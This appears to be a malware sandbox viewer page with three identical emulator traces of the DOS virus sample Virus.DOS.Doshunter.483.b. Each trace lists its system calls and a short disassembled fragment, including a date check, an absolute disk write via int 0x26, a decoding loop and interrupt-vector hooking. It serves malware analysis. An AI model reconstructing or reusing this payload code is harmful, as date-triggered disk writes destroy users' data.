Sample viewer

vx.netlux.org/Virus.DOS.Doshunter.483.b

Time	Syscall Op	Syscall Name
2018-12-17T23:06:10.565814854Z	42	PC: 12a44 \| Get date 0x12a44: cmp dx, 0x61a 0x12a48: jne 0x12a99 0x12a4a: adc word ptr [bp + si], ax 0x12a4c: mov cx, 0x80 0x12a4f: xor dx, dx 0x12a51: int 0x26 0x12a53: jb 0x12a99 0x12a55: mov bx, 0x139 0x12a58: mov ah, 0x63 0x12a5a: sub byte ptr [bx], ah 0x12a5c: inc bx 0x12a5d: cmp bx, 0x159 0x12a61: jne 0x12a5a 0x12a63: mov ax, 0x600 0x12a66: xor bx, bx 0x12a68: int 0x10 0x12a6a: mov ah, 2 0x12a6c: xor dx, dx 0x12a6e: int 0x10 0x12a70: mov ah, 9
2018-12-17T23:06:10.568616231Z	198	PC: 12aaa \| UNKNOWN!
2018-12-17T23:06:10.576557352Z	53	PC: 12abb \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:06:10.57805614Z	37	PC: 12af6 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:06:10.579595314Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=000003E8h/0000001000d bytes. ')
2018-12-17T23:06:10.584849192Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

Time	Syscall Op	Syscall Name
2018-12-25T12:43:30.186050417Z	42	PC: 12a44 \| Get date 0x12a44: cmp dx, 0x61a 0x12a48: jne 0x12a99 0x12a4a: adc word ptr [bp + si], ax 0x12a4c: mov cx, 0x80 0x12a4f: xor dx, dx 0x12a51: int 0x26 0x12a53: jb 0x12a99 0x12a55: mov bx, 0x139 0x12a58: mov ah, 0x63 0x12a5a: sub byte ptr [bx], ah 0x12a5c: inc bx 0x12a5d: cmp bx, 0x159 0x12a61: jne 0x12a5a 0x12a63: mov ax, 0x600 0x12a66: xor bx, bx 0x12a68: int 0x10 0x12a6a: mov ah, 2 0x12a6c: xor dx, dx 0x12a6e: int 0x10 0x12a70: mov ah, 9
2018-12-25T12:43:30.18918042Z	198	PC: 12aaa \| UNKNOWN!
2018-12-25T12:43:30.190037841Z	53	PC: 12abb \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:43:30.191306088Z	37	PC: 12af6 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:43:30.193224239Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=000003E8h/0000001000d bytes. ')
2018-12-25T12:43:30.198923539Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

Time	Syscall Op	Syscall Name
2018-12-25T12:43:30.229028924Z	42	PC: 12a44 \| Get date 0x12a44: cmp dx, 0x61a 0x12a48: jne 0x12a99 0x12a4a: adc word ptr [bp + si], ax 0x12a4c: mov cx, 0x80 0x12a4f: xor dx, dx 0x12a51: int 0x26 0x12a53: jb 0x12a99 0x12a55: mov bx, 0x139 0x12a58: mov ah, 0x63 0x12a5a: sub byte ptr [bx], ah 0x12a5c: inc bx 0x12a5d: cmp bx, 0x159 0x12a61: jne 0x12a5a 0x12a63: mov ax, 0x600 0x12a66: xor bx, bx 0x12a68: int 0x10 0x12a6a: mov ah, 2 0x12a6c: xor dx, dx 0x12a6e: int 0x10 0x12a70: mov ah, 9
2018-12-25T12:43:30.232981728Z	198	PC: 12aaa \| UNKNOWN!
2018-12-25T12:43:30.23410886Z	53	PC: 12abb \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:43:30.235366567Z	37	PC: 12af6 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:43:30.236857813Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=000003E8h/0000001000d bytes. ')
2018-12-25T12:43:30.243476266Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')